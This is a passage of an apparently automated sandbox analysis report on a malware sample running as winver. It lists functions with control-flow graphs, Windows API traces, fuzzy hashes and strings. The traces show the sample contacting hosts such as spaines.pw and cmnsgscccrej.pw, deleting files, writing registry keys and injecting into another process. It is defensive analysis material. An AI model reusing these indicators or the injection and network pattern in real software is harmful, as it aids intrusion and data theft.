                                                                                                                                                                          control_flow_graph 261 47e29dd-47e2a1a call 47e3653 lstrcat call 47e2501 call 47e2a14 call 47e3653 lstrcat 271 47e2a20-47e2a2b call 47e2b4d 261->271 273 47e2a30-47e2a43 call 47e34f7 271->273 275 47e2a48-47e2a4f 273->275 275->271 276 47e2a51-47e2a6d call 47e343f call 47e2683 275->276 281 47e2a6f 276->281 282 47e2a9a-47e2ab1 call 47e2683 276->282 281->282 283 47e2a71-47e2a86 call 47e26f9 281->283 288 47e2ade-47e2af5 call 47e2683 282->288 289 47e2ab3 282->289 283->282 291 47e2a88 283->291 296 47e2af8-47e2b11 call 47e2e97 288->296 297 47e2af7 288->297 289->288 292 47e2ab5-47e2aca call 47e26f9 289->292 291->282 294 47e2a8a-47e2a94 DeleteFileA 291->294 292->288 300 47e2acc 292->300 294->282 303 47e2b34-47e2b48 Sleep 296->303 304 47e2b13-47e2b1c call 47e3057 296->304 297->296 300->288 301 47e2ace-47e2ad8 DeleteFileA 300->301 301->288 303->275 304->303 307 47e2b1e-47e2b2e DeleteFileA 304->307 307->303
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E29D4), ref: 047E29E3
                                                                                                                                                                            • Part of subcall function 047E2A14: lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
                                                                                                                                                                            • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
                                                                                                                                                                            • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
                                                                                                                                                                            • Part of subcall function 047E2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
                                                                                                                                                                            • Part of subcall function 047E2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4261675396-0
                                                                                                                                                                          • Opcode ID: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
                                                                                                                                                                          • Instruction ID: dbb76a486875cc18f611aeac3547b53320ebceaf30b6b697990d25363b700e6b
                                                                                                                                                                          • Opcode Fuzzy Hash: f25f655f168d47ae09fd180d96ac9ab6615c369bbaafbdd74acb6aa40e99586a
                                                                                                                                                                          • Instruction Fuzzy Hash: 234148715002149EDF326F72CD48BBB76BCFF48709F0446D6AD45E6152DE34A580DEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2F38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 329 47e2f38-47e2f3b 330 47e2f3d 329->330 331 47e2fb1-47e2ffc call 47e363b send 329->331 330->331 336 47e2ffe 331->336 337 47e3042-47e3054 closesocket 331->337 338 47e3001-47e3015 send 336->338 338->337 339 47e3017-47e301c 338->339 339->338 340 47e301e-47e3023 339->340 341 47e3026-47e3038 recv 340->341 341->337 342 47e303a-47e303e 341->342 342->341 343 47e3040 342->343 343->337
                                                                                                                                                                          APIs
                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 047E2FF4
                                                                                                                                                                          • send.WS2_32(?,047E2A30,047E2A2C,00000000), ref: 047E300D
                                                                                                                                                                          • recv.WS2_32(?,047E2A30,00A00000,00000000), ref: 047E3030
                                                                                                                                                                          • closesocket.WS2_32(?), ref: 047E304A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: send$closesocketrecv
                                                                                                                                                                          • String ID: cmnsgscccrej.pw
                                                                                                                                                                          • API String ID: 3431254638-1830621847
                                                                                                                                                                          • Opcode ID: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                          • Instruction ID: c3c7316591e61417d0fd0c38551cda29e7db1df2ff484f539739444055fa76ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 3de71ac913557117b39ba19aefa8f7a10d2ba1ba6dbe92ee6fcdf69db35a4dda
                                                                                                                                                                          • Instruction Fuzzy Hash: 96114F32700014ABEF225E29CC45BAA7BF9EF48784F0545D4FE08AB255D335A9508BA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 344 47e2a14-47e2a1a call 47e3653 lstrcat 347 47e2a20-47e2a2b call 47e2b4d 344->347 349 47e2a30-47e2a43 call 47e34f7 347->349 351 47e2a48-47e2a4f 349->351 351->347 352 47e2a51-47e2a6d call 47e343f call 47e2683 351->352 357 47e2a6f 352->357 358 47e2a9a-47e2ab1 call 47e2683 352->358 357->358 359 47e2a71-47e2a86 call 47e26f9 357->359 364 47e2ade-47e2af5 call 47e2683 358->364 365 47e2ab3 358->365 359->358 367 47e2a88 359->367 372 47e2af8-47e2b11 call 47e2e97 364->372 373 47e2af7 364->373 365->364 368 47e2ab5-47e2aca call 47e26f9 365->368 367->358 370 47e2a8a-47e2a94 DeleteFileA 367->370 368->364 376 47e2acc 368->376 370->358 379 47e2b34-47e2b48 Sleep 372->379 380 47e2b13-47e2b1c call 47e3057 372->380 373->372 376->364 377 47e2ace-47e2ad8 DeleteFileA 376->377 377->364 379->351 380->379 383 47e2b1e-47e2b2e DeleteFileA 380->383 383->379
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E2A0B), ref: 047E2A1A
                                                                                                                                                                            • Part of subcall function 047E2B4D: inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                            • Part of subcall function 047E2B4D: gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                            • Part of subcall function 047E2B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2A94
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 047E2AD8
                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 047E2B2E
                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 047E2B42
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1642945479-0
                                                                                                                                                                          • Opcode ID: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                          • Instruction ID: a5896c7737cb109b106cfb92e09a232f157fb16318f94fd3cac3b832f4b8511a
                                                                                                                                                                          • Opcode Fuzzy Hash: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                          • Instruction Fuzzy Hash: BD3135715002199EEB326F62CC48BBB76FCFF48709F0006E6AD45E6156EE34A590DEA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2B4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138sleepnetworkCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 384 47e2b4d-47e2b57 385 47e2b5e-47e2b62 384->385 386 47e2b8b-47e2b9b 385->386 387 47e2b64-47e2b89 call 47e3673 385->387 389 47e2b9d-47e2ba0 386->389 392 47e2bd0-47e2be2 inet_addr 387->392 389->389 391 47e2ba2-47e2ba8 389->391 393 47e2bad-47e2bb6 391->393 396 47e2be4-47e2bf6 gethostbyname 392->396 397 47e2c03-47e2c3c call 47e3673 392->397 394 47e2bbc-47e2bbe 393->394 395 47e2bb8-47e2bba 393->395 394->393 395->394 399 47e2bc0-47e2bc1 395->399 396->385 400 47e2bfc-47e2c01 396->400 403 47e2c41-47e2c4f Sleep 397->403 399->393 402 47e2bc3-47e2bcf 399->402 400->397 402->392 403->403 404 47e2c51-47e2c85 call 47e3673 call 47e2399 call 47e2e97 403->404 410 47e2c8a-47e2ca2 call 47e2c99 call 47e379f 404->410 410->385 415 47e2ca8-47e2cad 410->415 415->385 416 47e2cb3-47e2cbc 415->416 416->385 417 47e2cc2-47e2cc5 416->417 417->385 418 47e2ccb-47e2cd1 417->418 419 47e2cde-47e2cf1 call 47e2cfc 418->419 420 47e2cd3-47e2cd8 418->420 419->385 423 47e2cf7-47e2cf9 419->423 420->385 420->419
                                                                                                                                                                          APIs
                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                          • Opcode ID: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                          • Instruction ID: 5405291d9bb5658d871f50fbd2721210e095de5baf4868901e275c016c416159
                                                                                                                                                                          • Opcode Fuzzy Hash: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                          • Instruction Fuzzy Hash: CC411871500104AEEB12AF26C888BBA7BEDEF48704F0587D5EC45EF247EB30A545CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2C99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107sleepnetworkCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 047E2BDA
                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 047E2BEE
                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 047E2C44
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                          • Opcode ID: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                          • Instruction ID: 6ec13d41a18d60d1b1a4b07974bb7c083d775ee62450ef6281aef36bb46b4467
                                                                                                                                                                          • Opcode Fuzzy Hash: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                          • Instruction Fuzzy Hash: C431B771100200AEEB129F25C888BBA77EDEF48704F0587D5ED45EF256EB30E544CBA5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0811 Relevance: 6.1, APIs: 4, Instructions: 111threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E086E: RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
                                                                                                                                                                            • Part of subcall function 047E086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
                                                                                                                                                                            • Part of subcall function 047E086E: RegCloseKey.KERNELBASE(?), ref: 047E08A9
                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0900
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CloseThreadValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 711899537-0
                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction ID: 159276b3e8571cdca3a7d2fc699c11c8a8dac7ef8ef5e1f8e6cf536af12488bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B31F7720002547FFB017F719D8AABA3BACEF05304F400365BD85DA2A5EAB46965CBB5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 463 47e0b65-47e0b72 call 47e3653 FindWindowA 466 47e0bac-47e0bca call 47e08b3 call 47e0c3f call 47e0c5d call 47e0bd7 463->466 467 47e0b74-47e0b8c GetWindowThreadProcessId OpenProcess 463->467 482 47e0bcc-47e0bcf 466->482 483 47e0c3b-47e0c3d 466->483 467->466 469 47e0b8e-47e0b94 call 47e0de0 467->469 472 47e0b99-47e0b9b 469->472 472->466 474 47e0b9d-47e0ba2 472->474 474->466 476 47e0ba4-47e0ba6 ExitProcess 474->476 485 47e0c1e-47e0c29 482->485 486 47e0bd1-47e0bd4 482->486 484 47e0c4f-47e0c57 483->484 487 47e0c4b-47e0c57 484->487 488 47e0c59-47e0c5c 484->488 491 47e0c2b-47e0c31 485->491 492 47e0c32 485->492 486->484 489 47e0bd6-47e0bec 486->489 487->487 487->488 489->485 491->492
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowA.USER32(047E0B57,0000000E), ref: 047E0B6A
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
                                                                                                                                                                            • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                            • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3233011861-0
                                                                                                                                                                          • Opcode ID: a2e69455e6c0235321cdb51dd2fbe0695d8de5085b34702a57dba59bfeb00964
                                                                                                                                                                          • Instruction ID: 404769c6805cd95bb3c50b6254a1d70dc562386942e28c573192a9aee262a053
                                                                                                                                                                          • Opcode Fuzzy Hash: a2e69455e6c0235321cdb51dd2fbe0695d8de5085b34702a57dba59bfeb00964
                                                                                                                                                                          • Instruction Fuzzy Hash: DB1127312053916EFF113B738D58EB63F296F0A704F094295E844EE2B3DAA0E406D738
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2683 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 047E269E
                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 047E26B7
                                                                                                                                                                          • ReadFile.KERNELBASE(047E298A,?,00000000,?,00000000), ref: 047E26DB
                                                                                                                                                                          • CloseHandle.KERNEL32(047E298A), ref: 047E26EC
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                          • Opcode ID: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                          • Instruction ID: 067e3c4d48927ae61c44364f0045c85a78a8afbdb0e86f01964c5568bf3b796a
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                          • Instruction Fuzzy Hash: C601EC30641209FFEF219F61CC45B6D7AB8FF04B44F2042A9AA14FD1E1D771AB609B54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E26F9 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 047E275F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3604237281-0
                                                                                                                                                                          • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                          • Instruction ID: 730c678bac26591c9cafaf265b92f6ee85b153ac0a97720c16897de759642bda
                                                                                                                                                                          • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                          • Instruction Fuzzy Hash: 4601F630640209BFEF219FA1CC45F9D7EB8BF04B04F1042A8BB14BD1E1D770AA61AB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 047E1372
                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 047E1387
                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 047E13E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction ID: 74cfef6a2a17147eb9311fde9b5962fb23ee4f452774474350f0c3e983a1da1e
                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                          • Instruction Fuzzy Hash: E5218E31904216AFDB119E79C849B6DBBB5AF08700F458325F955FB694D770A810CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E0B6B Relevance: 4.5, APIs: 3, Instructions: 22threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 047E0B77
                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 047E0B84
                                                                                                                                                                            • Part of subcall function 047E0DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,047E0D88,00000000,0000090B,00000000), ref: 047E0E06
                                                                                                                                                                            • Part of subcall function 047E0DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 047E0E24
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 047E0BA6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2938372061-0
                                                                                                                                                                          • Opcode ID: 92d44549b5709f63f8730254d569b315e67aba0022f272fcda3c2cab48766fcc
                                                                                                                                                                          • Instruction ID: 0c72b72681441a1bdf1250ab7aa10871dcb8b72fc15a7ce7387093499471faa3
                                                                                                                                                                          • Opcode Fuzzy Hash: 92d44549b5709f63f8730254d569b315e67aba0022f272fcda3c2cab48766fcc
                                                                                                                                                                          • Instruction Fuzzy Hash: 10E086746802912AFB113EA28C89FAA3E286F08755F080254FD85FE1D7CAA0D1564634
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E086E Relevance: 4.5, APIs: 3, Instructions: 18registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(00000000,047E0840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0876
                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 047E089D
                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 047E08A9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                          • Opcode ID: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                          • Instruction ID: d656670daf6e248caf9dbe5abbf866db88216dc43784e085ca31991b0d50db33
                                                                                                                                                                          • Opcode Fuzzy Hash: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                          • Instruction Fuzzy Hash: EBE09272100008BFEF126F60DC89A997B75EF54709F1480A1FE4AAD075CBB19AA0DF68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E08D9 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E0643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 047E065A
                                                                                                                                                                            • Part of subcall function 047E0643: LoadLibraryA.KERNELBASE(047E0673,00000009,?,00000000), ref: 047E0681
                                                                                                                                                                            • Part of subcall function 047E0643: lstrcmpiA.KERNEL32(?,00000000), ref: 047E06EB
                                                                                                                                                                            • Part of subcall function 047E0643: Sleep.KERNELBASE(00001388), ref: 047E06FE
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E071F
                                                                                                                                                                            • Part of subcall function 047E0643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0731
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0752
                                                                                                                                                                            • Part of subcall function 047E0643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 047E0764
                                                                                                                                                                            • Part of subcall function 047E0643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 047E0785
                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 047E0900
                                                                                                                                                                            • Part of subcall function 047E0CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E0D07
                                                                                                                                                                            • Part of subcall function 047E0CE8: Sleep.KERNELBASE(000003E8), ref: 047E0D1D
                                                                                                                                                                            • Part of subcall function 047E0CE8: Process32First.KERNEL32(?,00000000), ref: 047E0D3D
                                                                                                                                                                            • Part of subcall function 047E0CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 047E0D88
                                                                                                                                                                            • Part of subcall function 047E0CE8: Process32Next.KERNEL32(?,?), ref: 047E0D9E
                                                                                                                                                                            • Part of subcall function 047E0CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 047E0DCA
                                                                                                                                                                            • Part of subcall function 047E0CE8: Sleep.KERNELBASE(000003E8), ref: 047E0DD5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
